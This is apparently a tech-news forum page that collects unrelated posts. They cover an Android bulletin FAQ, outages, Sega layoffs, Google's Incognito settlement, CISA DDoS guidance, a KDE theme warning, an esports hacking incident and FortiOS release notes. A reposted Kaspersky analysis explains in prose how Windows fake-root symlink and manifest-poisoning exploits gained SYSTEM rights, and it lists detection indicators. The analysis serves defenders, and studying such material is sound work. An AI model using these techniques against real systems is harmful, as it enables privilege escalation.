    Abbreviation Definition RCE Remote code execution EoP Elevation of privilege ID Information disclosure DoS Denial of service N/A Classification not available 4. What do the entries in the References column mean?
    Entries under the References column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.
    Prefix Reference A- Android bug ID QC- Qualcomm reference number M- MediaTek reference number N- NVIDIA reference number B- Broadcom reference number U- UNISOC reference number 5. What does an * next to the Android bug ID in the References column mean?
    Issues that are not publicly available have an * next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.
    6. Why are security vulnerabilities split between this bulletin and device/partner security bulletins, such as the Pixel bulletin?
    Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device/partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.
    SeedTheNet
    WhatsApp, the popular messaging platform used by billions worldwide, experienced a major outage today at 9:00 pm, causing users to be unable to send or receive messages. The outage affected users across various regions
     

    Image source : https://downdetector.com/status/whatsapp/
    Service seems to be back to normal.
    SeedTheNet
    Sega's recent announcement of extensive layoffs has sent shockwaves through the gaming industry, impacting key studios such as Sega Europe, Creative Assembly, and Hardlight. The news came in an email from Sega Europe boss Jurgen Post, detailing the layoffs affecting approximately 240 roles across these studios. Notably, the email also mentioned the sale of Relic Entertainment, responsible for iconic titles like Company of Heroes and Dawn of War.
    While specific numbers for each studio were not disclosed, Sega did confirm that Sports Interactive and Two Point Studios, also under the Sega Europe umbrella, were not affected. Despite the layoffs, Creative Assembly's upcoming projects, including new entries in the Total War series and an unannounced project, are still in active development.
    The sale of Relic Entertainment marks a significant transition as the studio moves towards becoming independently operated. Sega expressed its support for this shift, indicating a positive outlook for Relic's future endeavors. Relic itself affirmed its newfound independence, mentioning an external investor aiding in this transition. Notably, work on Company of Heroes 3 and ongoing support for their existing games will continue unabated.
    This announcement underscores the volatile nature of the gaming industry, where companies must navigate evolving market dynamics while striving to maintain creativity and innovation. As Sega and its associated studios navigate these changes, the gaming community eagerly anticipates the future projects and developments that will emerge from this transformative period.
    With Relic have posted this with the news announcement :

    I think after Relic failed with Company of Heroes 3 and ruined the series with this failure , SEGA might have lost more than it invested and realized it is not worth to keep Relic with their failing game CoH3.
    From a gaming giant in the old school gaming market, to a company that is laying off staff and developers.
    SeedTheNet
    Google Settles Lawsuit, Agrees to Delete Billions of Data Records from Chrome's Incognito Mode
    In a significant development regarding online privacy, Google has reached a settlement in a class-action lawsuit that accused the tech giant of collecting data from users' Chrome browsers while in Incognito mode without proper disclosure. This settlement marks a crucial step in addressing concerns about user privacy and data collection practices in one of the most widely used web browsers globally.
    The lawsuit, filed in June 2020, alleged that Google collected billions of data records from 136 million Chrome users in the United States while they were browsing in Incognito mode. This mode is designed to offer users a private browsing experience by not storing their browsing history or cookies. However, the lawsuit argued that Google's practices violated users' privacy expectations and failed to provide adequate transparency about data collection activities.
    As part of the settlement, Google has agreed to delete the data records collected from Chrome users in Incognito mode. This move is significant as it demonstrates Google's acknowledgment of the concerns raised by users and regulatory bodies regarding data privacy. By taking this action, Google aims to address the allegations of undisclosed data collection and improve transparency in its browser's privacy features.
    The case highlights broader issues surrounding online privacy and the challenges users face in maintaining control over their personal data while using digital services. Incognito mode, although intended to offer a level of privacy, has faced scrutiny for not providing complete anonymity or protection against tracking by websites and third-party entities.
    In response to the settlement, Google has reaffirmed its commitment to user privacy and stated that it will continue to enhance privacy features in Chrome to provide users with more control over their data. This includes improving transparency about data collection practices, implementing stricter privacy controls, and empowering users to make informed decisions about their online privacy settings.
    The resolution of this lawsuit serves as a reminder of the importance of transparency, accountability, and user empowerment in the digital age. It highlights the ongoing efforts by both technology companies and regulators to address privacy concerns and create a more privacy-conscious digital ecosystem that respects users' rights to data protection and control.
    SeedTheNet
    14 Mar 2024
    Authors
    Elsayed Elrefaei Ashraf Refaat Kaspersky GERT On August 8, 2023, Microsoft finally released a kernel patch for a class of vulnerabilities affecting Microsoft Windows since 2015. The vulnerabilities lead to elevation of privilege (EoP), which allows an account with user rights to gain SYSTEM privileges on a vulnerable host. The root cause of this attack surface, according to a 2015 blog, is the ability of a normal user account to replace the original C:\ drive with a fake one by placing a symlink for the system drives in the device map for each login session. This fake drive will be followed by the kernel during impersonation instead of the original system drive. More than five months after the patches for these vulnerabilities were released, we’re still seeing some of their exploits in the wild because it’s a very easy way to get a quick NT AUTHORITY\SYSTEM and that’s why it may be favored by well-known threat actors.
    We discussed these findings at the BlackHat MEA conference in November 2023, and in December 2023 and January 2024, we found two exploits that could still use this attack surface in the unpatched version of Windows. Both exploits are packed in UPX. After analyzing the first one, we saw that it was a packed version of a Google Project Zero PoC sample. The other sample was a packed version of an SSD Secure Disclosure public PoC, even using the same NamedPipe “\\\\.\\Pipe\\TyphoonPWN” without modifications. The PDB paths for both samples are:
    C:\Users\Administrator\source\repos\exp\x64\Release\exp.pdb C:\VVS-Rro\CVEs\spool\BitsPoc\src\x64\Release\PoC_BITs.pdb Below we will highlight the key points and then focus on how to check if any of the vulnerabilities have been exploited or if there have been any attempts to exploit them, and enumerate popular CVEs included in this vulnerable surface.
    Affected processes and services include native Windows services that run by default on most versions of the operating system. These include:
    CSRSS Windows Error Reporting (WER) File history service Background intelligence transfer service (BITS) Print Spooler Vulnerable Windows processes and services
    The exploits affecting this attack surface share a common logic or pattern, including:
    Searching for a DLL that runs with system integrity. The DLL has an isolation-aware manifest file. The ability to change the C:\ root to a writable directory via symlinks. CSRSS | CVE-2022-22047
    This Activation Context Cache Poisoning vulnerability leads to local privilege escalation. It’s one of the CVEs that was actively exploited by a threat actor called KNOTWEED | Denim Tsunami.
    Reversing the in-the-wild exploit for the CVE-2022-22047 shows:
    The exploit crafts a call into CSRSS. The call requests an activation context for a privileged executable and specifies a malicious manifest.
    The manifest uses an undocumented manifest XML attribute named loadFrom. This attribute allows unrestricted redirection of DLLs to any location on a disk, including locations outside of the normal search path, without even having to change the C:\ root drive.
    Here is a detailed blog post by ZDI explaining CSRSS Cache Poisoning.
    CSRSS | CVE-2022-37989
    The second vulnerability, involving CSRSS Cache Poisoning, was a workaround for the first CVE-2022-22047. After patching the undocumented “LoadFrom” attribute, there was another attribute that could be abused to load a manifest file from a user-controlled path by declaring a dependent assembly using path traversal in the name attribute.

    The patch for the CVE-2022-37989 was simple: check if the name attribute of the dependency contains any forward or backward slashes, and set a flag to stop caching this suspicious manifest if name path traversal is detected. This CVE was discovered by ZDI.
    Print Spooler | CVE-2022-29104
    Print Spooler is a service that runs by default in almost all versions of Windows. It’s responsible for managing paper print jobs sent from a computer to a printer or print server. Reversing in-the-wild exploits of the CVE-2022-29104 Print Spooler vulnerability shows that it’s a .NET sample that creates a symbolic link from C:\ to the fake root C:\Imprint. The sample was uploaded to VirusTotal.

    Fake C:\ drive structure:
    C:\Imprint\Windows\system32 C:\Imprint\Windows\WinSxS All folders inside the Imprint folder are writable, allowing an attacker to control their contents.
    Path traversal is added to “AssemblyIdentity” to point to the Imprint writable path.

    The vulnerability analysis shows that:
    An attacker can remap the root drive (C:\) for privileged processes during impersonation. During impersonation, all file accesses are performed using the DOS device map of the impersonated process. CSRSS uses a user-modified side-by-side manifest for generating the activation context instead of the manifest in the WinSxS folder C:\Windows\WinSxS. The WinSxS folder stores multiple copies of system files and components. The WinSxS folder provides a central location for storing different versions of system files that are shared by multiple applications and processes. The WinSxS folder provides system stability and compatibility by allowing different applications to use the specific versions of files they need. WinSxS avoids DLL hell, a problem that occurs when different applications require different versions of the same DLL. The Windows operating system uses the application manifest to determine which version is appropriate for which app.
    The application manifest is stored in XML format and describes:
    The dependencies associated with the application. What permissions the application requires. What compatibility settings the application supports. CSRSS mitigation was enabled for spoolsv.exe and printfilterpipelinesvc.exe to stop impersonation while loading external resources, and then to resume impersonation after the external resources are loaded.
    Print Spooler | CVE-2022-41073
    After CVE-2022-29104 was patched, another vulnerability affecting Print Spooler was discovered – CVE-2022-41073. Reversing the in-the-wild exploit of this vulnerability shows some XML manipulation using path traversal to a writable path containing a modified version of prntvpt.dll that is loaded by Print Spooler.

    According to Project Zero, mitigation was added to CSRSS, the patch simply stopped any impersonation prior to the LoadLibraryExW call in winspool!LoadNewCopy, and then resumed it.
    After that the LoadLibraryExW call returned:
    + if (RevertToProcess(&TokenHandle, x) >= 0) { lib = LoadLibraryExW(arg1, 0, dwFlags); + ResumeImpersonation(TokenHandle); + } 1 2 3 4 + if (RevertToProcess(&TokenHandle, x) >= 0) {   lib = LoadLibraryExW(arg1, 0, dwFlags); +   ResumeImpersonation(TokenHandle); + } NtOpenFile is called with the OBJ_IGNORE_IMPERSONATED_DEVICEMAP flag. It will stop impersonation when loading any external resources while using the LoadNewCopy API. Stopping impersonation means that privileged processes will not use the fake root implemented with the medium integrity process, and instead it will use the original C:\ drive root to avoid loading untrusted or malicious resources.
    Windows Error Reporting | CVE-2023-36874
    Windows Error Reporting (WER) is a privileged service that analyzes and reports various software issues in Windows. The root cause for the exploitation of the CVE-2023-36874 vulnerability is CreateProcess API when a crash happens, because CreateProcess API can be tricked into following the fake root and creating the process from this writable fake root in the context of the privileged WER service, leading to privilege escalation.
    CVE-2023-36874 was exploited in the wild and has several published PoCs. The exploit interacts with the IWerReport COM interface and calls SubmitReport, then UtilLaunchWerManager is called, which calls CreateProcess. CreateProcess API is then vulnerable to DoS device modification.

    Once the exploit to submit a fake crash report is executed, it will end up calling the vulnerable CreateProcess API.
    File History Service | CVE-2023-35359
    File History Service can be used to automatically back up personal folders and files such as documents, pictures and videos. Reversing the in-the-wild exploit shows that when File History Service starts, it impersonates the current user and then loads a DLL called fhcfg.dll under impersonation. This DLL has an “application aware manifest config” that attempts to load another resource called msasn1.dll. The exploit starts with the usual technique of changing the C:\ root to a fake writable root.

    Windows Error Reporting – 2nd exploit | CVE-2023-35359
    After patching the first Windows Error Reporting vulnerability, which used the CreateProcess API inside the privileged WER service and follows the fake root to create a process. The patched WER service started using CreateProcessAsUser instead of CreateProcess API. However, after that patch, adversaries found another way that could lead to the use of CreateProcess again under certain conditions, which was considered a new vulnerability. For example, if the WER service was marked as disabled on a system and there was a privileged process impersonating a medium-integrity user on that system, and an unhandled exception occurs during impersonation that results in a crash, that crash tries to enable the WER service for reporting. The detailed analysis for this CVE shows that it does not appear to be exploitable.
    The exploitation of CVE-2023-35359
    BITS | CVE-2023-35359
    The Background Intelligence Transfer Service (BITS) is responsible for facilitating the asynchronous and prioritized transfer of files between a client and a server. BITS operates in the background, which means it can perform file transfers without interrupting a user or consuming all of the available network.
    You may notice that the number CVE-2023-35359 has not changed for the last three CVEs because Microsoft decided in the last patch to assign the same CVE to all vulnerabilities of this type. So there are different vulnerabilities in different processes/services but with the same CVE number.
    Timeline for the bypassing/patching process from 2015 to August 2023
    How was the patch for this attack surface applied?
    The patch was applied to ObpLookupObjectName to check if the loaded resource is a file object and the call to ObpUseSystemDeviceMap succeeds. It then ignores the impersonation and uses SystemDevice.

    ObpLookupObjectName checks FileObjectType followed by a call to ObpUseSystemDeviceMap.

    The ObpUseSystemDeviceMap function checks for the SystemDevice to be used instead of the impersonated device.
    How to check if a vulnerability was exploited or any attempts were made to exploit it?
    When analyzing most of the exploits targeting this attack surface, we observed a common behavior that could be used as an indicator of whether there were any attempted exploits:
    Most of the in-the-wild exploits create a writable folder inside the C:\ drive, and the structure of this folder mimics the structure of the original C:\ drive, for example: C:\Windows\System32 → C:\FakeFolder\Windows\System32 C:\Windows\WinSxS → C:\FakeFolder\Windows\WinSxS So finding a writable folder that mimics the C:\ drive folder structure may be an indicator of an exploitation attempt. Copying the manifest files from the original WinSxS folder in C:\Windows\WinSxS to a writable directory and modifying them could be a good indicator of an exploitation attempt. Manifest files that contain undocumented XML attributes such as “LoadFrom” or manifest files that contain path traversal in the “name” attribute could be a valid sign of an exploitation attempt. Creating a symbolic link from the original system drive to a writable directory, especially from processes with medium integrity using the \RPC Control\ object directory.
    SeedTheNet
    The United States government has recently updated its Distributed Denial of Service (DDoS) guidelines on March 2024
    The updated guidelines, released by the Cybersecurity and Infrastructure Security Agency (CISA), provide comprehensive recommendations and best practices to mitigate the impact of DDoS attacks. These guidelines are designed to help organizations across various sectors, including government agencies, private enterprises, and critical infrastructure operators, better defend against and respond to DDoS incidents.
     
    DoS and DDoS A DoS and a DDoS attack are similar in that they both aim to disrupt the availability of a target system or network. However, there are key differences between the two.
    1. DoS Attack: A DoS attack involves a single source used to overwhelm the target system with a flood of traffic or resource-consuming requests. The malicious actor typically uses one computer or a small number of computers to generate the attack. The goal of a DoS attack is to render the target system unavailable to its intended users and deny them access to resources or services.
    2. DDoS Attack: A DDoS attack involves multiple sources. Often, a multitude of compromised computers—known as botnets—are coordinated to launch the attack. Each machine in the botnet sends a flood of traffic or requests to the target system simultaneously to amplify the follow-on impact. Due to the distributed nature of a DDoS attack, defending targeted networks has increased difficulty compared to a DoS attack. The main advantage of a DDoS attack over a DoS attack is the ability to generate a significantly higher volume of traffic, overwhelming the target system’s resources to a greater extent. DDoS attacks can also employ various techniques, such as IP spoofing, which involves a malicious actor manipulating the source IP address and botnets to disguise the origin of the attack and make it more difficult to trace it back to them. In terms of impact, both DoS and DDoS attacks can disrupt the availability of a targeted system or network, leading to service outages, financial losses, and reputational damage.

    DoS and DDoS Attacks Categorized Into Three Technique Types
    1. Volume-Based Attacks: These attacks aim to consume the available bandwidth or system resources of the target by overwhelming it with a massive volume of traffic. The goal is to saturate the network or exhaust the target’s resources, rendering it unable to handle legitimate requests.

    Source : Taken from the PDF file, rest can be found in the bottom of the post with the PDF Link.
    The updated guidelines underscore the evolving nature of cyber threats and the need for proactive measures to safeguard digital assets and critical infrastructure. By adopting these guidelines and investing in cybersecurity measures, organizations can strengthen their resilience against DDoS attacks and contribute to a more secure cyber landscape.
     
    The guideline can be found here : https://www.cisa.gov/sites/default/files/2024-03/Understanding and Responding to Distributed Denial-of-Service Attacks_508c.pdf
    SeedTheNet
    WARNING: Global themes and widgets created by 3rd party developers for Plasma can and will run arbitrary code. You are encouraged to exercise extreme caution when using these products.
    A user has had a bad experience installing a global theme on Plasma and lost personal data.
    https://www.reddit.com/r/kde/comments/1bixmbx/do_not_install_global_themes_some_wipe_out_all/

    Global themes change the look of Plasma, but also the behavior. To do this they run code, and this code can be faulty, as in the case mentioned above. The same goes for widgets and plasmoids.
     



    For now as CAUTION , better not to download any custom themes for Plasma KDE Linux
    https://floss.social/@kde/112128243960545659
     
    SeedTheNet
    Due to cheats being used in the Final , the Tournament was postponed and a twitter post by Apex Legends Esports states the following :

    While Easy Anti Cheat stating this after

    According to PCGAMESN website that :
    Midway through their match on Storm Point, TSM’s Phillip ‘ImperialHal’ Dosen and DarkZero’s Noyan ‘Genburten’ Ozkose were both hit by what appears to be an RCE hack, meaning that the bad actor could, in theory, manipulate elements of their games.
    As a result, both players had their cheats toggled on instead of off, hence Hal’s “I’ve got an aimbot.”Additionally, as the hack went through, a bizarre message seems to have popped up on Genburten’s screen, showing that cheats were, in fact, switched on mid-match.
    As a result, Respawn terminated the match, officially stating that “due to the competitive integrity of this series being compromised, we have made the decision to postpone the NA finals at this time.
    We will share more  information soon.”

    ---
    It is quite weird and funny how even in Tournaments , Gamers will still try to cheat while the Anti-Cheat software or the people who monitor are almost useless.
    Paying a license to anticheat software as a developer that won't be able to protect your game even in a country wide tournament.. is quite an astonishing disappointment.
    EAC clarifying that their software is not vulnerable but not clarifying about the cheat being un-detected is also more funny.

    Gamers were hacking their way to the 2 millions
    SeedTheNet
    Resolved issues
    7.0.14  Application Control
    Bug ID
    Description
    820481
    For firewall policies using inspection-mode proxy, some HTTP/2 sessions may be invalidly detected as unknown application.
    DNS Filter
    Bug ID
    Description
    907365
    DNS proxy caches DNS responses with only one CNAME record.
    Endpoint Control
    Bug ID
    Description
    979811
    The ZTNA channel is not cleaned when overwriting old lls entries.
    Explicit Proxy
    Bug ID
    Description
    901627
    Explicit proxy and SD-WAN fail to match a policy if the destination has multiple zones set.
    942612
    Web proxy forward server does not convert HTTP version to the original version when sending them back to the client.
    978473
    Explicit proxy policy function issues when matching external-threat feed categories.
    Firewall
    Bug ID
    Description
    898938
    NAT64 does not recover when the interface changes.
    953907
    Virtual wire pair interface drops all packet if the prp-port-in/prp-port-out setting is configured under system npu-setting prp on FG-101F. 977641
    In transparent mode, multicast packets are not forwarded through the bridge and are dropped.
    GUI
    Bug ID
    Description
    848660
    Read-only administrator may encounter a Maximum number of monitored interfaces reached error when viewing an interface bandwidth widget for an interface that does not have the monitor bandwidth feature enabled.
    867802
    GUI always displays Access denied error after logging in.
    874502
    A prompt to Login as ReadOnly/ReadWrite is not displayed when post-login-banner is enabled on a FortiGate managed by FortiManager.
    969101
    Managed FortiAP-s page is not loading for non super-admin users.
    HA
    Bug ID
    Description
    871636
    HA configuration synchronization packets (Ethertype 0x8893) are dropped when going through VXLAN.
    904117
    When walking through the session list to change the ha_id, some dead sessions could be freed one more time.
    924671
    There is no response on ha-mgmt-interfaces after a reboot when using a VLAN interface based on hd-sw as the ha-mgmt interface.
    937246
    An error condition occurred while forwarding over a VRRP address, caused by the creation of a new VLAN.
    949352
    The user.radius checksum is the same in both HA units, but the GUI shows a different checksum on the secondary and the HA status is out of sync.
    962681
    In a three member A-P cluster, the dhcp lease list (execute dhcp lease-list) might be empty on secondary units.
    Hyperscale
    Bug ID
    Description
    839958
    service-negate does not work as expected in a hyperscale deny policy.
    940511
    In some cases, carrier-grade NAT is dropping traffic.
    984852
    The HA/AUX ports are not enabled on boot up when using the NPU path option.
    Intrusion Prevention
    Bug ID
    Description
    923393
    IPS logs show incorrect source and destination IP addresses and policy IDs, and the ports are zeros.
    IPsec VPN
    Bug ID
    Description
    897867
    IPsec VPN between two FortiGates (100F and 60F) experiences slow throughput compared to the available underlay bandwidth.
    898961
    diagnose traffictest issues with dynamic IP addresses and loopback interfaces.
    914418
    File transfer stops after a while when offloading is enabled.
    921691
    In FGSP, IKE routes are not removed from the kernel when secondary-add-ipsec-routes is disabled.
    926002
    Incorrect traffic order in IPsec aggregate redundant member list after upgrade.
    945873
    Inconsistency of mode-cfg between phase 1 assigned IP address and destination selector addition.
    950012
    IPsec tunnels stuck on NP6XLite spoke drop the ESP packet.
    950445
    After a third-party router failover, traffic traversing the IPsec tunnel is lost.
    961305
    FortiGate is sending ESP packets with source MAC address of port1 HA virtual MAC address.
    968218
    When the IPsec tunnel destination MAC address is changed, tunnel traffic may stop.
    Log & Report
    Bug ID
    Description
    940814
    Administrators without read permissions for the threat weight feature cannot see the event log menu.
    954565
    Although there is enough disk space for logging, IPS archive full message is shown.
    965247
    FortiGate syslog format in reliable transport mode is not compliant with RFC 6587.
    967692
    The received traffic counter is not increasing when the traffic is HTTPS with webfilter.
    987261
    In the webfilter content block UTM log in proxy inspection mode, sentbyte and rcvdbyte are zero.
    Proxy
    Bug ID
    Description
    790426
    An error case occurs in WAD while redirecting the web filter HTTPS sessions.
    806556
    Unexpected behavior in WAD when the ALPN is set to http2 in the ssl-ssh-profile.
    828917, 919781
    Unexpected behavior in WAD when there are multiple LDAP servers configured on the FortiGate.
    845361
    A rare error condition occurred in WAD caused by compounded SMB2 requests.
    940149
    Inadvertent traffic disruption caused by WAD when it receives an HTTP2 data frame payload on a dead stream.
    947814
    Too many redirects on TWPP after the second KRB keytab is configured.
    954104
    An error case occurs in WAD when WAD gets the external authenticated users from other daemons.
    Routing
    Bug ID
    Description
    781483
    Incorrect BGP Originator_ID from route reflector seen on receiving spokes.
    890954
    The change of an IPv6 route does not mark sessions as dirty nor trigger a route change.
    897666
    Issue with SD-WAN rule for FortiGuard.
    914815
    FortiGate 40F-3G4G not adding LTE dynamic route to route table.
    926525
    Routing information changed log is being generated from secondary in an HA cluster.
    952908
    Locally originated type 5 and 7 LSAs' forward address value is incorrect.
    954100
    Packet loss status in SD-WAN health check occur after an HA failover.
    Security Fabric
    Bug ID
    Description
    782518
    Threat feeds are showing that the connection status has not started when it should be connected.
    841364
    Cisco APIC SDN update times out on large datasets.
    956423
    In HA, the primary unit may sometimes show a blank GUI screen.
    SSL VPN
    Bug ID
    Description
    894704
    FortiOS check would block iOS and Android mobile devices from connecting to the SSL VPN tunnel.
    898889
    The internal website does not load completely with SSL VPN web mode.
    906756
    Update SSL VPN host check logic for unsupported OS.
    957406
    OS checklist for SSL VPN in FortiOS does not include macOS Sonoma 14.
    Switch Controller
    Bug ID
    Description
    816790
    Console printed DSL related error messages when disconnecting the managed FortiSwitch and connecting to the FortiGate again.
    858749
    Redirected traffic should not hit the firewall policy when allow-traffic-redirect is enabled.
    911232
    Security rating shows an incorrect warning for unregistered FortiSwitches on the WiFi & Switch Controller > Managed FortiSwitches.
    937065
    An exported FortiSwitch port is not correctly showing up/down status.
    System
    Bug ID
    Description
    631046
    diagnose sys logdisk smart does not work for NVMe disk models.
    733096
    FG-100F HA secondary's unused ports flaps from down to up, then to down.
    763739
    On FG-200F, the Outbound bandwidth in the Bandwidth widget does not match outbandwidth setting.
    861661
    SNMP OID 1.3.6.1.2.1.4.32 ipAddressPrefixTable is not available.
    882187
    FortiGate enters conserve mode in a few hours after enabling UTM on the policies.
    888655
    FortiGate queries system DNS for A <Root> and AAAA <Root> servers.
    894045
    Sensor information widget continuously loading.
    909225
    ISP traffic is failing with the LAG interfaces on upstream switches.
    910700
    Ports are flapping and down on the FortiGate 3980E.
    912092
    FortiGate does not send ARP probe for UDP NP-offloaded sessions.
    916493
    Fail detection function does not work properly on X1 and X2 10G ports.
    919901
    For FIPS-CC mode, the strict check for basic constraints should be removed for end entity certificates.
    926817
    Review the temperature sensor for the SoC4 system.
    929904
    When L3 or L4 hashing algorithm is used, traffic is not forwarded over the same aggregate member after being offloaded by NP7.
    937982
    High CPU usage might be observed on entry-level FortiGates if the cache size reaches 10% of the system memory.
    938174
    ARP issue with VXLAN over IPsec and Soft Switch.
    938981
    The virtual server http-host algorithm is redirecting requests to an unexpected server.
    943948
    FortiGate as L2TP client is not working with Cisco ASR as L2TP server.
    946413
    Temperature sensor value missing for FG-180xF, FG-420xF, and FG-440xF platforms.F
    947240
    FortiGate is not able to resolve ARPs of few hosts due to their ARP replies not reaching the primary FPM.
    955074
    MSS clamping is not working on VXLAN over IPsec after upgrading.
    960707
    Egress shaping does not work on NP when applied on the WAN interface.
    962153
    A port that uses a copper-transceiver does not update the link status in real-time.
    963600
    SolarWinds unable to negotiate encryption, no matching host key type found.
    966761
    SNMP OID 1.3.6.1.2.1.4.34.1.5 ipAddressPrefix is not fully implemented.
    971404
    Session expiration does not get updated for offloaded traffic between a specific host range.
    977231
    An error condition occurred in fgfm caused by an out-of-band management configuration.
    User & Authentication
    Bug ID
    Description
    837185
    Automatic certificate name generation is the same for global and VDOM remote certificates, which can cause certificates to exist with the same name. 864703
    ACME client fails to work with some CA servers.
    868994
    FortiGate receives FSSO user in the format of HOSTNAME$.
    VM
    Bug ID
    Description
    938382
    OpenStack Queens FortiGate VM HA heartbeat on broadcast is not working as expected.
    968740
    Unexpected behavior in awsd caused by tags with an empty value on AWS instances while adding a new AWS Fabric connector.
    WAN Optimization
    Bug ID
    Description
    954541
    In WANOpt transparent mode, WAN optimization does not keep the original source address of the packets.
    Web Filter
    Bug ID
    Description
    925801
    Custom Images are not seen on Web Filter block replacement page for HTTP traffic in flow mode.
    982156
    The URL local/user category rating result has only one best match category (longest URL pattern match), and other matched local/user categories cannot be chosen even if the category is configured in the profile.
    WiFi Controller
    Bug ID
    Description
    874997
    Fetching the registration status does not always work.
    Common Vulnerabilities and Exposures
    Visit https://fortiguard.com/psirt for more information.
    Bug ID
    CVE references
    956553
    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference:
    CVE-2024-23112 959918
    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference:
    CVE-2023-38545
    989429
    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference:
    CVE-2024-21762 993323
    FortiOS 7.0.14 is no longer vulnerable to the following CVE Reference:
    CVE-2024-23113

  • Member Statistics

    39
    Total Members
    53
    Most Online
    fluoxetine cost
    Newest Member
    fluoxetine cost
    Joined
×
×
  • Create New...

Important Information

Privacy Policy

  I accept